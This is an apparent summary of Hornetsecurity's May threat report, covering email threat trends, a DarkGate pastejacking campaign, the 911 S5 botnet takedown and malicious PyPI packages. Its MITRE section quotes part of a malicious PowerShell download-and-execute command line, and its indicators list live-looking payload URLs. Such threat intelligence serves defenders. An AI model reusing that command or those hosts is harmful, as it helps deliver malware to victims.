Hornetsecurity’s May Monthly Threat Report highlights a rise in email-based threats driven by easily detectable, low-effort spam, plus a notable increase in malicious attachments and targeted campaigns across industries. It also covers Darkgate pastejacking, the 911 S5 Proxy Botnet takedown, and impersonation campaigns (Fedex, Facebook) as well as malicious activity tied to StackOverflow PyPI packages. #DarkGate #Pastejacking #911S5ProxyBotnet #Fedex #Facebook #StackOverflow #PyPI
Keypoints
- Email-based threats rose in May, driven largely by easily detectable low-effort spam messages.
- Malicious file attachments increased, with archive files rising 13.2 percentage points in usage.
- All business verticals faced more targeting, led by the mining, entertainment, and media sectors.
- Brand impersonation spiked for Fedex and Facebook.
- A new Darkgate campaign used pastejacking to distribute malware, with a detailed deep-dive in the report.
- The 911 S5 Proxy Botnet was dismantled by US and international partners, in what may be the largest botnet takedown to date (over 19 million IPs involved).
- Threat actors have exploited Stack Overflow by guiding users to download malicious PyPI packages.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – There was a clear increase in the use of malicious attachments over the last month. – “There was a clear increase in the use of malicious attachments over the last month.”
- [T1059.003] Windows Command Shell – The article shows a command line flow starting with cmd /c start /min powershell … – “cmd /c start /min powershell $jr = ‘c:userspublicDp.hta’; invokewebrequest -uri …”
- [T1059.001] PowerShell – Base64 decoding and execution via iex PowerShell cmdlet – “Next, a base64 string is decoded and executed thanks to the iex PowerShell cmdlet.”
- [T1105] Ingress Tool Transfer – The script downloads a ZIP from a remote server, expands it, and executes it (AutoIt3) as part of infection. – “The script downloads a ZIP document called 1.zip from a remote server, saves it in the c: folder, unzips the content and deletes the previously downloaded ZIP. Then, to perform the infection, it runs AutoIt3.exe with script.a3x as an argument.”
- [T1115] Clipboard Data – The technique copies content to the clipboard as part of the pastejacking flow. – “copies the web page’s title content, previously decoded by the atob function, to the clipboard … Pastejacking.”
- [T1132] Data Encoding – The use of base64 encoding/decoding to conceal the payload. – “base64 string is decoded and executed”
Indicators of Compromise
- [IP Address] context – more than 19 million unique IP addresses involved in the 911 S5 Botnet takedown
- [Domain] context – megabrightsigns[.]com, languangjob[.]com (sender domains used in May 27-28 campaigns)
- [URL] context – hxxps://kostumn1.ilabserver.com/1.zip, hxxps://jenniferwelsh.com/header.png (and other listed phishing-related URLs)
- [SHA-256] context – 5316fc2cb4c54ba46a42e77e9ee387d158f0f3dc7456a0c549f9718b081c6c26, 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
- [FileName] context – 1.zip, AutoIt3.exe (files referenced in the Darkgate workflow)
Read more: https://www.hornetsecurity.com/en/threat-research/monthly-threat-report-june-2024/